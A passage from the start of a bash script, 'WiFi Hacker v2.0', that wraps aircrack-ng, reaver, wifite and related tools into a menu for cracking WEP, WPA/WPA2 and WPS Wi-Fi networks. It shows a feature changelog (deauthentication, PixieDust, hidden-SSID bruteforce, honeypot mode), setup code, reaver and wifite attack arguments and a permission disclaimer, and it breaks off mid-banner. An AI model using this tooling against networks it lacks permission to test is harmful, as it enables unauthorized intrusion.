#!/bin/bash ############################################################################ # CREDITS BEGIN ######################################################## ############################################################################ # WiFi Hacker v2.0 # esc0rtd3w 2019 # https://github.com/esc0rtd3w/wifi-hacker/ # Uses parts of the aircrack-ng suite, reaver, wifite, and many other tools ############################################################################ # CREDITS END ########################################################## ############################################################################ ############################################################################ # VERSION HISTORY BEGIN ################################################ ############################################################################ # v2.0 # - Added support for new Gnome terminal options. Tested in Kali 2018.4 # v1.9 # - Added support for Wash. Currently used for dumping scan info out to text. # - Added "Bruteforce Hidden SSID Options" To Extras Menu and updated bruteforceHiddenSSID() Function. # - Updated Menu Navigation to restrict from entering Extras Menu until after a wireless adapter has been selected. # - Configured updates with new coloring, and now will only update if remote version is higher than local version. # - Cleaned up code for doSleepMessage() Function. Now takes 3 arguments, "message", "time", and "color". # - Updated Extras Menu. Added wpa_supplicant enable and disable options. Updated wpa_cli options. # - Updated Reaver save session to only save a backup if current session file exists. # - Fixed and updated Reaver output post screen that was broken in the last release version. # v1.8 # - Cleaned up scripting and moved all global hotkey triggers to a loadMenuHotkeys Function. # - Added a bruteforceHiddenSSID() Function to handle hidden SSID name reveals. # - Added logging to XML file from airodump-ng when scanning Access Points for all encryption types. # - Added automatic 10 second timeout for Update Menu to continue to main menu for attacking. # - Fixed Update Menu. "Check For Update" and "Apply New Update" are now functional. # - Update Menu now loads automatically after accepting license agreement. # - Added support for parsing network adapter names for displaying when selecting adapter to use. # - Added a check for PixieWPS attacks. If failed, will now default to normal Reaver attack. # v1.7 # - Currently supports up to 10 wifi adapters. # - Changed hotkey for "Manual Adapter Entry" from "M" to "C", because of conflicting with main menu hotkey # - Added adapter check after disclaimer is agreed, so the main menu will show the correct number of adapters. # - Updated "killCounterMax" to use "interfacesFound" value for "stopMonitorMode()" function # - Added "checkMultipleAdapters" Function # - Added number of interfaces displayed on stats banner. # - Fixed "Interface Name" on stats banner. # - Updated airodump-ng scripting for several functions. # - Fixed PixieDust toggles. They were reversed, disable turned on and vice/versa. # - Updated airodump-ng windows to only scan for the encryption type that is currently being targeted. # v1.6 # - Added a "forceDisconnectWiFi" function to help fix active internet connection issues. # - Changed the handling of "WiFi Force Disconnect". Now, after accepting the agreement, the main menu will only load if the connection status is "0". If the status is "1", meaning the WiFi is connected to an access point, the "forceDisconnectWiFi" and "checkNetworkStatus" functions are called until the connection is released. This allows for better control of correcting errors resulting in having an active network connection. # - Added "ifconfig" and "iwconfig" output to Extras Interface Menu # - Merged "checkForEmptyBSSID", "checkForEmptyESSID", and "checkForEmptyChannel" into "checkForEmptyCredentials" function. # - Removed "arAttackDeAuthOnRetry" function. This was a duplicate and now uses "arAttackDeAuth" function instead. # - Cleaned up "stopMonitorMode" function. # - Added support for bully, used for WPS attacks. # - Fixed issue with active network connection not force disconnecting before attacks begin. # - Updated text for several menus. # - Fixed (mostly) the issue with backup ZIP files overwriting old backups. # v1.5 # - Updated code to handle new cleaning invoked backup options for "backupSessionFiles" function. # - Added progress text for "cleanCaptureFiles", "cleanSessionFiles", and backupSessionFiles" functions. # - Fixed "Clean Session Files" and Clean Capture Files" options from Extras Menu. # - Now saving session files after Wifite Auto Attacks to prevent the .cap, .xor, etc files from being deleted. # - Updated minimal number of IVs to 5000 before cracking for Wifite WEP Auto Attacks. # - Fixed Wifite auto arguments for all encryption types. # - Updated Misc Menu Text # - Added "aireplay-ng" and "packetforge-ng" to dependency check. # - Added terminal background colors and updated foreground text color selection. # - Added a "more" option that can be typed under WEP Attack Menu. This menu has "TCP Dump", "Generate ARP Packet", "Forge ARP Request", and "Replay ARP Request" options. # v1.4 # - Updated WPS attack to use PixieDust as a default option after 10 second timeout if no selection is made. # - Added a manual interface name override option to "getWirelessInterfaces" function. Set manually to wlan0, wlan1, wlan2, etc. This will automatically display during normal execution and you may ignore it for defaults. # - Added a "refresh" flag that is set to hide override text on subsequent calls to "getWirelessInterfaces" function. # - Added "bannerSlim" function to use a "Title Only" banner for disclaimer and unreleased menus. # - Updated text for gathering target info on all the different encryption types. # - Updated sleep messages for WPS attacks. # - Fixed PixieDust option not setting correctly if nothing is selected at menu choice. # - Updated text for all banners. Changed the main title text and domain name. # - Fixed all the killProcess functions to now kill the process until it no longer shows up under process list. # - Added a force exit for aircrack-ng before cracking attempt. This attempts to fix the corrupt errors when scanning IVS and CAP files. # - Fixed previous Airodump and Aireplay windows not closing when launching a new dump session for WEP Attack Menu. # - Added "findCaptureFiles" function to list all available cap, ivs, csv, netxml files for cracking. # - Added terminal colors to a "setTerminalColors" function. # - Added "checkUpdate" and "getUpdate" functions to grab the newest shell script directly. # - Updated text on stats banner. Changed "Interface Name: " to "Interface: " to allow for longer ESSID names without flooding to the next line. # v1.3 # - Added support for AirCrack Suite v1.2+ using the new wlanXmon format instead of monX. # - Fixed "wlanXmon" error in Kali Linux 2.x caused by new AirCrack Suite 1.2+. See "fixKaliTwoMonError" function for more info. # - Added a function to check the Linux version running. # - Removed Honeypot Mode from the banners. It has been relocated to the Advanced Menu. # - Added "$interfaceName" and "$interfaceMode" variables. # - Added interfaceName to the stats banner. This will display the current interface name (wlan0, mon0, wlan0mon, etc). # - Added interfaceMode to the main banner. Valid Interface Modes are 0=Managed / 1=Monitor Standard / 2=Monitor New / 3=Monitor Other / 4=Unknown # - Added "Open Interface Options" item to Extras Menu. # - Added "Interface Up", "Interface Down", "Interface Managed", and "Interface Monitor" to Extras Menu. The Up and Down functions affect the interface ONLY for monitor mode (mon0, mon1, wlan0mon, wlan1mon, etc) currently. Please use Enable/Disable Channel Hopping to bring up/down a managed interface (i.e. wlan0, wlan1, etc). # - Added support for all new Reaver arguments and options for Kali 2.x build. # - Added airodump-ng WPS scanning options to now show WPS connections without using wifite to show them. # - Removed the wifite window from being launched with standard WPS attack. Replaced by --wps flag in airodump-ng. # - Added "fixAirmonCompat" function to send the command to kill any processes that may interfere. # - Removed the "initAirmon" function that was inactive. # - Added the airmon-ng conflicting process fix to Extras Menu. # - Added "wlanXmon" interfaces for monitor mode termination. A better way of doing this will be done soon! # - Fixed not returning to Extras Menu from "Open Interfaces Menu". # - Added "isDebugMode" variable to show/hide certain areas that may need additional testing output. Disabled by default. # - Fixed default WEP dump scanning channel hopping during attack. # v1.2 # - Fixed the top text of disclaimer banner from being cut off. # v1.1 # - Now globally enforcing disconnection from any active network upon agreement of disclaimer to resolve "Channel Hopping" issues. This must be done for all attacks to work properly. # - Added "HoneyPot Mode" to main toolbar. The hotkey is "Z" to launch from anywhere in script. There is currently support for airbase-ng and wifi-honey. # - Fixed "Negative One Channel Error" occuring in airodump-ng on Kali Linux 1.0.6 and higher. This is fixed globally and should work on all platforms. # - Added "Start NetworkManager", "Stop NetworkManager", "Stop wpa_supplicant", "Stop wpa_cli", "Enable Channel Hopping", and "Disable Channel Hopping" to Extras menu. # - Enabled the Advanced Menu. Also enabled the hotkey "A" to launch it. Future releases will contain highly configurable settings for supported apps and modules. # - Added support for nmap and netcat, for use during post exploitation. # - Fixed some $bssid and $essid variable errors in WEP attacks. # - Fixed airodump window not closing if using load session hotkey during victim info, and then returning to the post monitor mode menu. # - Fixed a bug where the post monitor mode screen would still load if no encryption type was selected. If the encryption type is empty, it will now return to the main menu. # - Updated on-screen instructions for using the airdump windows and other terminal windows that are opened during target/victim setup. # - Fixed network connection not refreshing the correct status when returning to the main menu if the network status has changed while still on the menu. # - Added a second check to verify that no active network connection is present before launching an attack. # - Moved autoMode text towards the top of the post monitor mode initiation screen to be more easily visible to the user. # - Added support for post-exploitation attacks after a target has been compromised. # - Added support for "wifite". This is used for some of the newer automated attack modes as well as an alternate option to aircrack-suite if desired. # - Added Auto Attack Mode to the main menu. This option uses wifite to scan and attack any vulnerable network. # - Changed some text around on some items to be more clear and understandable. # - Added Auto modes for each attack type when selected. Once an encryption type is selected, you can type "autowep, autowps, autowpa, and autowpa2 respectively to automate the attack. # - Fixed a few $lastMenuID variables not properly set for menu navigation. # - Added a wifite window alongside the aircrack window when selecting WPS attacks, to help decipher which targets support WPS more easily. # v1.0 # - Activated the disclaimer when launching the script to make sure everyone knows the rules ;) # - Added "checkRootStatus" to verify elevated privileges before launching main menu. # - Fixed a few typos throughout the script. # - Added Connection display to main menu. A status of "0" is disconnected and "1" is connected. # - Added connection status check before allowing an attack mode to be selected. This prevents trying to start an attack and being locked into a channel and other abnormalities. # - Added text display variables for connection status. They can be displayed as "None" or "Wifi", depending on if connection status is 0 or 1. # v0.9 # - Removed the writeDCrackPy() function. This was used to write the Python script dcrack.py out to a file. # v0.8 # - Added support for besside-ng. Used for cracking WPA/WPA2 passwords,and upload to cloud cracking, # - Fixed the aircrack window from closing after running dictionary attack. # - Added checkDependencies() function to check for all required files before loading main menu. # - Fixed the Navigation Bar from not showing up on the Help menu. # - Fixed the aircrack window from not closing when restarting WPA/WPA2 attacks. # - Fixed Help and Advanced menus not returning to the last page when trying to go back. # v0.7 # - Fixed WEP aircrack errors with ESSID names that have spaces in them. # - Fixed Terminal Options not returning to previous menu properly. # - Cleaned up some old code that is no longer being used or referenced. # - Fixed reaver WPC files not getting copied correctly. # - Now copies all WPC files during reaver startup, and overwrites current WPC file after reaver session ends. # v0.6 # - Added time and date stamp to all $encryptionType.sessions log files. # - The "Clean Capture Files" option now only removes files in the init directory, not sessions directory. # - Fixed bug not returning back to Extras menu after selected task has been completed. # - All created files will now be saved to the "/sessions/$encryptionType" directory by default. # - Added getCurrentDate() and getCurrentTime() functions to use with sessions and backups. # - Added Backup options to Extras menu. This creates a zip file with all saved sessions and capture files. # - Added "*.kismit.csv" and "*.kismit.netxml" files to "Cleanup Capture Files" menu under Extras. # - Changed all references from $currentTask to $lastMenuID because of menu navigation issues. # - Added a new variable called $lastMenuID for (hopefully) proper navigation between menus. # - Moved code for checking MAC Spoof Status into a checkSpoofStatus() function. Can now be used globally. # - Fixed a typo in Load Session function. # - Updated sessions save folder and organized by encryption type. # - Added saving reaver session WPC files to default sessions folder. # v0.5 # - Fixed WEP attack. It wasn't being properly redirected after the last v0.4 update. # - All attack modes re-tested and seem to be working fine. # - Added a check for empty encryption type to prevent doing certain tasks if no type has yet been selected. # - Updated Save and Load session menu. It does not work properly from some menus. Still in testing. # v0.4 # - Moved all initialization functions and variables to initMain(). This is only for "code cleanliness". # - Updated aircrack and airodump redirection based on the encryption type of the attack. # - Added "Clean Session Files" to Extras menu. Be careful with this and be sure to keep backups. # - Fixed not being able to return to attacks menu from Save and Load session for WEP attacks. # - Added a $currentTask variable to change dynamically depending on what function is being executed. # - Moved aircrack windows for WPA and WPA2 attacks to external terminal windows. # - Fixed not being able to leave aircrack window while running WPA and WPA2 attacks. # v0.3 # - Updated WPA and WPA2 attack modes. Both are fully working and can load custom wordlists. # - Added the ability to change terminals under Extras menu. Supports Gnome, Konsole, Xterm, and Custom. # - Fixed blank session files being written when no encryption type has yet been selected. # - Added a disclaimer that must be accepted before launching main menu (currently disabled). # - Fixed both WPA and WPA2 from not writing proper values to "$capturePath/$encryptionType/$encryptionType.sessions" log file. # - Fixed a bug in WPA/WPA2 that prevented returning to main menu or exiting from wordlist page. # - Updated some on-screen text when deauth station is running for WEP, WPA, and WPA2. # - Removed Auto mode from top banner, its now defaulted after choosing encryption type. # v0.2 # - Fixed WEP and WPS (reaver) attacks. Both are fully working now! # - Each attack type writes to its own log file now ("$capturePath/$encryptionType/$encryptionType.sessions"). # - Cleaned up some old migrated code from previous scripts. # v0.1 # - Initial version. Combined other current wifi scripts into one. ############################################################################ # VERSION HISTORY END ################################################## ############################################################################ ############################################################################ # TO DO LIST BEGIN ##################################################### ############################################################################ # Extend the width of the airodump windows when opening externally # Add change options on-the-fly for WPS and other attack modes # Add cowpatty support for WPA/WPA2 attacks # Set an "ok so far" temp variable to see if all dependencies are available # Set default $serverWPA veriable to some value other than blank # Add sniffing/wireshark support # Add support for airbase-ng # Create separate handshake file with an appropriate filename # Add "create wordlist" for phone numbers and possibly others. Add option for local # Add checks and copy files created by besside to appropriate directories # Add convert to .hccap support for ocl-hashcat and other compatible software # Get advanced mode working # Get help menu working # Post-Exploitation Attacks To Add (Probably Scrap 20160514) # driftnet # nmap # wifi-honey ############################################################################ # TO DO LIST END ####################################################### ############################################################################ ############################################################################ # INITIALIZATION OPTIONS BEGIN ######################################### ############################################################################ initMain(){ #checkArgs checkLinuxVersion killAll #startNetworkManager getCurrentDate getCurrentTime getCurrentDateAndTime setDependencies checkDependencies resizeWindow setVariablesRequired setVariablesOptional setVariablesAdvanced setDefaults setDefaultsWEP setDefaultsWPA setDefaultsWPA2 setDefaultsWPS setDefaultSession setTerminalColors # Optionally show dependencies before launch #showDependencies # Optionally Show Disclaimer Before Launch showDisclaimer # Optionally Show Unreleased Text Before Launch #isUnreleased # Load Main Menu menuMain } checkArgs(){ case "$#" in "1") if [ -e $1 ]; then echo "File $1 Exists" else echo "File $1 Does Not Exist" fi ;; esac } checkLinuxVersion(){ # Set both default Kali values to ON and if blank, Kali is not present isKali=1 isKaliTwo=1 # Get Linux Build Info linuxVersion=$(lsb_release -a | grep Description | cut -f2 -d":") # Check against the Linux Version for the presence of Kali kali=$(echo "$linuxVersion" | grep Kali) # Check against the Linux Version for the presence of Kali 2.x kaliTwo=$(echo "$linuxVersion" | grep Kali | grep 2.) # Check For Kali Linux case "$kali" in "") isKali=0 ;; esac # Check For Kali Linux 2.x # Uses Aircrack-ng v1.2 RC2+ (Monitor Mode Is Different) case "$kaliTwo" in "") isKaliTwo=0 ;; esac #echo "Linux Version: $linuxVersion" #echo "" #echo "Is Kali?: $isKali" #echo "" #echo "Is Kali 2.x?: $isKaliTwo" #read pause } ############################################################################ # INITIALIZATION OPTIONS END ########################################### ############################################################################ ############################################################################ # DEPENDENCY OPTIONS BEGIN ############################################# ############################################################################ setDependencies(){ pathAircrack="/usr/bin/aircrack-ng" pathAireplay="/usr/sbin/aireplay-ng" pathAirodump="/usr/sbin/airodump-ng" pathBesside="/usr/sbin/besside-ng" pathCut="/usr/bin/cut" pathDate="/bin/date" pathGrep="/bin/grep" pathHead="/usr/bin/head" pathLink="/usr/bin/link" pathMacchanger="/usr/bin/macchanger" pathMkdir="/bin/mkdir" pathPacketforge="/usr/sbin/packetforge-ng" pathReaver="/usr/bin/reaver" pathRmdir="/bin/rmdir" pathSed="/bin/sed" pathSleep="/bin/sleep" pathTail="/usr/bin/tail" pathWash="/usr/bin/wash" pathWget="/usr/bin/wget" } checkDependencies(){ #tempCounter=0 #numberOfDependencies=0 #tempPath="" #tempStatus="" # If counter is less than max dependencies, then build statuses #if [ $tempCounter -lt $numberOfDependencies ]; # then # # Set Path Name # if [ -f $tempPath ]; # then # # Set Status As Available # $tempStatus="OK" # else # # Set Status As Unavailable # $tempStatus="NA" # fi # else # #echo "Done With Dependencies" # #read pause #fi if [ -f $pathAircrack ]; then statusPathAircrack="OK" else statusPathAircrack="NA" fi if [ -f $pathAirodump ]; then statusPathAirodump="OK" else statusPathAirodump="NA" fi if [ -f $pathAireplay ]; then statusPathAireplay="OK" else statusPathAireplay="NA" fi if [ -f $pathBesside ]; then statusPathBesside="OK" else statusPathBesside="NA" fi if [ -f $pathCut ]; then statusPathCut="OK" else statusPathCut="NA" fi if [ -f $pathDate ]; then statusPathDate="OK" else statusPathDate="NA" fi if [ -f $pathGrep ]; then statusPathGrep="OK" else statusPathGrep="NA" fi if [ -f $pathHead ]; then statusPathHead="OK" else statusPathHead="NA" fi if [ -f $pathLink ]; then statusPathLink="OK" else statusPathLink="NA" fi if [ -f $pathMacchanger ]; then statusPathMacchanger="OK" else statusPathMacchanger="NA" fi if [ -f $pathMkdir ]; then statusPathMkdir="OK" else statusPathMkdir="NA" fi if [ -f $pathPacketforge ]; then statusPathPacketforge="OK" else statusPathPacketforge="NA" fi if [ -f $pathReaver ]; then statusPathReaver="OK" else statusPathReaver="NA" fi if [ -f $pathRmdir ]; then statusPathRmdir="OK" else statusPathRmdir="NA" fi if [ -f $pathSed ]; then statusPathSed="OK" else statusPathSed="NA" fi if [ -f $pathSleep ]; then statusPathSleep="OK" else statusPathSleep="NA" fi if [ -f $pathTail ]; then statusPathTail="OK" else statusPathTail="NA" fi if [ -f $pathWash ]; then statusPathWash="OK" else statusPathWash="NA" fi if [ -f $pathWget ]; then statusPathWget="OK" else statusPathWget="NA" fi } downloadDependencies(){ blank="" } showDependencies(){ banner bannerStats echo "" echo "List of File Dependencies Needed" echo "" echo "$pathAircrack - Status: $statusPathAircrack" echo "$pathAireplay - Status: $statusPathAireplay" echo "$pathAirodump - Status: $statusPathAirodump" echo "$pathBesside - Status: $statusPathBesside" echo "$pathCut - Status: $statusPathCut" echo "$pathDate - Status: $statusPathDate" echo "$pathGrep - Status: $statusPathGrep" echo "$pathHead - Status: $statusPathHead" echo "$pathLink - Status: $statusPathLink" echo "$pathMacchanger - Status: $statusPathMacchanger" echo "$pathMkdir - Status: $statusPathMkdir" echo "$pathPacketforge - Status: $statusPathPacketforge" echo "$pathReaver - Status: $statusPathReaver" echo "$pathRmdir - Status: $statusPathRmdir" echo "$pathSed - Status: $statusPathSed" echo "$pathSleep - Status: $statusPathSleep" echo "$pathTail - Status: $statusPathTail" echo "$pathWash - Status: $statusPathWash" echo "$pathWget - Status: $statusPathWget" echo "" echo "" echo "Press ENTER to continue...." read pause } ############################################################################ # DEPENDENCY OPTIONS END ############################################### ############################################################################ ############################################################################ # TERMINAL OPTIONS BEGIN ############################################### ############################################################################ setWindowTitle(){ currentTask="setWindowTitle" title='echo -ne "\033]0;WiFi Hacker v2.0\007"' $title } resizeWindow(){ currentTask="resizeWindow" printf '\033[8;32;115t' } setTerminalColors(){ currentTask="setTerminalColors" # Foreground Colors defaultFG=$(echo 'printf' '\033[39m') black=$(echo 'printf' '\033[30m') blue=$(echo 'printf' '\033[34m') cyan=$(echo 'printf' '\033[36m') darkGrey=$(echo 'printf' '\033[90m') green=$(echo 'printf' '\033[32m') lightBlue=$(echo 'printf' '\033[94m') lightCyan=$(echo 'printf' '\033[96m') lightGreen=$(echo 'printf' '\033[92m') lightGrey=$(echo 'printf' '\033[37m') lightMagenta=$(echo 'printf' '\033[95m') lightRed=$(echo 'printf' '\033[91m') lightYellow=$(echo 'printf' '\033[93m') magenta=$(echo 'printf' '\033[35m') red=$(echo 'printf' '\033[31m') white=$(echo 'printf' '\033[0m') whiteAlt=$(echo 'printf' '\033[97m') yellow=$(echo 'printf' '\033[33m') # Background Colors defaultBG=$(echo 'printf' '\033[49m') blackBG=$(echo 'printf' '\033[40m') blueBG=$(echo 'printf' '\033[44m') cyanBG=$(echo 'printf' '\033[46m') darkGreyBG=$(echo 'printf' '\033[100m') greenBG=$(echo 'printf' '\033[42m') lightBlueBG=$(echo 'printf' '\033[104m') lightCyanBG=$(echo 'printf' '\033[106m') lightGreenBG=$(echo 'printf' '\033[102m') lightGreyBG=$(echo 'printf' '\033[47m') lightMagentaBG=$(echo 'printf' '\033[105m') lightRedBG=$(echo 'printf' '\033[101m') lightYellowBG=$(echo 'printf' '\033[103m') magentaBG=$(echo 'printf' '\033[45m') redBG=$(echo 'printf' '\033[41m') whiteBG=$(echo 'printf' '\033[107m') yellowBG=$(echo 'printf' '\033[43m') } setTerminalTextEffects(){ currentTask="setTerminalTextEffects" textBlink=$(echo -e "\e[5m") textBold=$(echo -e "\e[1m") textDim=$(echo -e "\e[2m") textHidden=$(echo -e "\e[8m") textInverted=$(echo -e "\e[7m") textUnderline=$(echo -e "\e[4m") } ############################################################################ # TERMINAL OPTIONS END ################################################# ############################################################################ ############################################################################ # DEFAULT VARIABLES BEGIN ############################################## ############################################################################ setVariablesRequired(){ currentTask="setVariablesRequired" versionBase="2.0" versionBaseClean="00" initPath="$PWD" isDebugMode="0" isDevBuild="0" # Update Stuff versionRemote="0.0" versionRemoteClean="00" versionRemoteTemp="0.0" newUpdateAvailable="0" updateMaster=https://raw.githubusercontent.com/esc0rtd3w/wifi-hacker/master/wifi-hacker.sh updateTemp="/tmp/update-check.tmp" updateChecked="0" skipUpdate="0" returnToUpdatePage="0" # Setting default update downloaded script value newVersionScript="0.0" # Check Gnome version for terminal options (added 20190205) gnomeVer=$(gnome-terminal --version | grep "3.") case "$gnomeVer" in # Kali 2018.4 GNOME Terminal 3.30.0 using VTE 0.54.1 +GNUTLS "") gnomeOptions="legacy" terminal="gnome-terminal -x" terminalGnome="gnome-terminal -x" terminalGnomeLegacy="gnome-terminal -x" ;; *) gnomeOptions="new" terminal="gnome-terminal --window --geometry=132x24 --" terminalGnome="gnome-terminal --window --geometry=132x24 --" terminalGnomeLegacy="gnome-terminal -x" ;; esac #echo "gnomeOptions: $gnomeOptions" #read pause terminalKonsole="konsole -e" terminalXterm="xterm -e" bin="" } setVariablesOptional(){ currentTask="setVariablesOptional" blank="" } setVariablesAdvanced(){ currentTask="setVariablesAdvanced" blank="" } setDefaults(){ currentTask="setDefaults" startMonitorMode="airmon-ng start" stopMonitorMode="airmon-ng stop" getRandomMacAddress="" spoofStatus="0" resetSpoofStatus="0" encryptionType="empty" encryptionTypeText="Empty" ipStatus="0" interface="wlan0" #interfaceMonitor="mon0" interfaceMonitor="wlan0mon" interfaceName="wlan0" interfaceMode="0" interfaceNumber="0" interfaceNumberMax="99" interfacesFound="0" bssid="" essid="" channel="" noChannel="0" # This is used to return from backupCaptureFiles if invoked from backupCaptureFiles backupFromCaptureErase="0" # This is used to return from backupSessionFiles if invoked from backupSessionFiles backupFromSessionErase="0" # Default Attack Methods attackMethodWEP="" attackMethodWPS="reaver" attackMethodWPA="" attackMethodWPA2="" #Find Network Adapter Commands showAdapterPciAll=$(lspci | egrep -i 'network|ethernet') showAdapterUsbAll=$(lsusb | egrep -i '') showAdapterUsbAtheros=$(lsusb | egrep -i 'atheros|0cf3') # Atheros WiFi Adapters showAdapterUsbAtherosAR9271=$(lsusb | egrep -i 'AR9271' | cut -d ":" -f3) # Intel WiFi Adapters showAdapterUsbIntel6205=$(lspci | egrep -i 'Intel Corporation Centrino Advanced-N 6205' | cut -d ":" -f3) # Support For 10 Adapter Names adapterNameDefault="No Adapter Name Available" showAdapterOneName="$adapterNameDefault" showAdapterTwoName="$adapterNameDefault" showAdapterThreeName="$adapterNameDefault" showAdapterFourName="$adapterNameDefault" showAdapterFiveName="$adapterNameDefault" showAdapterSixName="$adapterNameDefault" showAdapterSevenName="$adapterNameDefault" showAdapterEightName="$adapterNameDefault" showAdapterNineName="$adapterNameDefault" showAdapterTenName="$adapterNameDefault" # Default Capture Lists Values listCap=0 listIvs=0 listXor=0 listCsv=0 listNetXml=0 hotkeyInput="" apListType="" # Default Session Values sessionID="0" capturePath=$(echo "$PWD/sessions") capturePathWEP=$(echo "$PWD/sessions/wep") capturePathWPS=$(echo "$PWD/sessions/wps") capturePathWPA=$(echo "$PWD/sessions/wpa") capturePathWPA2=$(echo "$PWD/sessions/wpa2") # Default Current Directory Temp Path whTemp=$(echo "$PWD/temp") defaultScanOutputIVS="$initPath/apScan-01.ivs" defaultScanOutputXML="$initPath/apScan-01.kismet.netxml" defaultScanOutputTXT="$initPath/apScan-01.txt" } setDefaultsWEP(){ currentTask="setDefaultsWEP" # aircrack-ng cracking mode WEP acMode="1" # aircrack-ng cracking mode WEP (WPA-PSK) #acMode="2" washFile="$whTemp/wash.txt" washChannel="1" } setDefaultsWPA(){ currentTask="setDefaultsWPA" wordlist="/usr/share/wordlists/metasploit/password.lst" retryDeauth="0" serverWPA="" } setDefaultsWPA2(){ currentTask="setDefaultsWPA2" } setDefaultsWPS(){ currentTask="setDefaultsWPS" reaver="reaver" reaverSessionPath="etc/reaver" bssidCharOnly="" reaverInterfaceInput="" reaverBSSIDInput="" reaverChannelInput="" reaverESSIDInput="" reaverExecInput="" reaverMACInput="" reaverOutfileInput="" reaverSessionInput="" reaverDelayInput="" reaverFailWaitInput="" reaverM57TimeoutInput="" reaverMaxAttemptsInput="" reaverPinInput="" reaverTimeoutInput="" reaverDelay="--delay=" reaverDHSmall="--dh-small" reaverEAPTerminate="--eap-terminate" reaverFailWait="--fail-wait=" reaverIgnoreLocks="--ignore-locks" reaverM57Timeout="--m57-timeout=" reaverMaxAttempts="--max-attempts=" reaverNack="--nack" reaverNoAssociate="--no-associate" reaverNoNacks="--no-nacks" reaverPin="--pin=" reaverRecurringDelay="--recurring-delay" reaverTimeout="--timeout=" reaverWin7False="--win7" reaver5ghz="--5ghz" reaverAuto="--auto" reaverChannel="--channel=" reaverDaemonize="--daemonize" reaverESSID="--essid=" reaverExec="--exec=" reaverFixed="--fixed" reaverHelp="--help" reaverMAC="--mac=" reaverOutfile="--out-file=" reaverQuiet="--quiet" reaverSession="--session=" reaverVerbose="-v" reaverVerboseMore="-vv" # Updated Options reaverDaemonize="-D" reaverExhaustive="-X" reaverNoAutoPass="-Z" reaverP1Index="-1" reaverP2Index="-2" reaverPixie="-K" reaverPixieLoop="-P" reaverGeneratePin="-W" reaverCurrentSessionFile="" # -K Argument Number (Default 1) pixieNumber="1" # Check to see if Pixie Attack Failed pixieFailed="0" wifite="wifite" wifiteAttackAll="wifite --all" wifiteAttackWEP="wifite --all --wep" wifiteAttackWPA="wifite --all --wpa" wifiteAttackWPA2="wifite --all --wpa" wifiteAttackWPS="wifite --all --wps" # Bully Options #bully interface } ############################################################################ # DEFAULT VARIABLES END ################################################ ############################################################################ ############################################################################ # DISCLAIMER BEGIN ##################################################### ############################################################################ showDisclaimer(){ currentTask="showDisclaimer" lastMenuID="showDisclaimer" sessionCreatePaths sessionRemoveEmpty bannerSlim $cyan echo "" echo "****************************************************************************************************" echo "THIS WILL TERMINATE ANY ACTIVE INTERNET CONNECTION! IF YOU HAVE ISSUES CONNECTING TO THE INTERNET" echo "AFTER AN ATTACK HAS BEEN PERFORMED, USE THE EXTRAS OPTION IN TOOLBAR TO START AND STOP SERVICES." echo "IF THIS DOES NOT WORK, THEN YOU CAN RESTART THIS SCRIPT, OR REBOOT THE MACHINE AND RETURN TO NORMAL." echo "****************************************************************************************************" echo "" $green echo "**********************************************************" echo "YOU MUST AGREE TO THESE TERMS BEFORE USING THIS SOFTWARE!" echo "**********************************************************" $white echo "" echo "By using this script, you are agreeing to the following terms:" echo "" echo "1) Not to be used for attacking access points that you do not have permission to test" echo "" echo "2) Stay within legal limits of transmission power, depending on your country laws" echo "" echo "3) Stay within legal limits of channel usage, depending on your country laws" echo "" $green echo "**********************************************************" echo "YOU MUST AGREE TO THESE TERMS BEFORE USING THIS SOFTWARE!" echo "**********************************************************" $white echo "" echo "" echo "" echo "PLEASE PRESS "\""Y"\"" AND ENTER TO ACCEPT AND CONTINUE" echo "" read agreeToDisclaimer case "$agreeToDisclaimer" in "") bannerExit ;; "Y" | "y") checkForUpdates fixNegativeOneChannelError #initAirmon fixAirmonCompat #startNetworkManager #killNetworkManager #wpaSupplicantKill #initMonitorMode #stopMonitorMode #checkMultipleAdapters menuMain ;; *) bannerExit ;; esac } isUnreleased(){ currentTask="isUnreleased" lastMenuID="isUnreleased" sessionCreatePaths sessionRemoveEmpty bannerSlim $cyan echo "" echo "****************************************************************************************************" echo "THIS WILL TERMINATE ANY ACTIVE INTERNET CONNECTION! IF YOU HAVE ISSUES CONNECTING TO THE INTERNET" echo "AFTER AN ATTACK HAS BEEN PERFORMED, USE THE EXTRAS OPTION IN TOOLBAR TO START AND STOP SERVICES." echo "IF THIS DOES NOT WORK, THEN YOU CAN RESTART THIS SCRIPT, OR REBOOT THE MACHINE AND RETURN TO NORMAL." echo "****************************************************************************************************" echo "" $green echo "**********************************************************" echo "YOU MUST AGREE TO THESE TERMS BEFORE USING THIS SOFTWARE!" echo "**********************************************************" echo "" $yellow echo "***THIS IS UNRELEASED AND SHOULD BE CONSIDERED A TEST VERSION***" echo "***THIS IS UNRELEASED AND SHOULD BE CONSIDERED A TEST VERSION***" echo "***THIS IS UNRELEASED AND SHOULD BE CONSIDERED A TEST VERSION***" echo "***THIS IS UNRELEASED AND SHOULD BE CONSIDERED A TEST VERSION***" echo "***THIS IS UNRELEASED AND SHOULD BE CONSIDERED A TEST VERSION***" echo "***THIS IS UNRELEASED AND SHOULD BE CONSIDERED A TEST VERSION***" echo "***THIS IS UNRELEASED AND SHOULD BE CONSIDERED A TEST VERSION***" echo "***THIS IS UNRELEASED AND SHOULD BE CONSIDERED A TEST VERSION***" echo "" $green echo "**********************************************************" echo "YOU MUST AGREE TO THESE TERMS BEFORE USING THIS SOFTWARE!" echo "**********************************************************" echo "" echo "" echo "" $white echo "PLEASE PRESS "\""Y"\"" AND ENTER TO ACCEPT AND CONTINUE" echo "" read agreeToDisclaimer case "$agreeToDisclaimer" in "") bannerExit ;; "Y" | "y") checkForUpdates fixNegativeOneChannelError #initAirmon fixAirmonCompat #startNetworkManager #killNetworkManager #wpaSupplicantKill #initMonitorMode #stopMonitorMode #checkMultipleAdapters menuMain ;; *) bannerExit ;; esac } ############################################################################ # DISCLAIMER END ####################################################### ############################################################################ ############################################################################ # BANNERS BEGIN ######################################################## ############################################################################ banner(){ setWindowTitle currentTask="banner" clear $blue echo "--------------------- **************************************************************** ----------------------" echo "| [M] Main Menu | * WiFi Hacker v$versionBase / esc0rtd3w 2019 / github.com/esc0rtd3w * | [X] Exit |" echo "--------------------- **************************************************************** ----------------------" $yellow echo "-------------------------------------------------------------------------------------------------------------------" echo "| Interfaces: $interfacesFound | Interface Mode: $interfaceMode | [A] Advanced | Sessions: [S] Save [L] Load | [E] Extras [H] Help |" echo "-------------------------------------------------------------------------------------------------------------------" #echo "" $white } bannerNoMenu(){ currentTask="bannerNoMenu" setWindowTitle clear $blue echo "--------------------- **************************************************************** ----------------------" echo "| [ CTRL+C ] Main | * WiFi Hacker v$versionBase / esc0rtd3w 2019 / github.com/esc0rtd3w * | [CTRL+C x2 ] 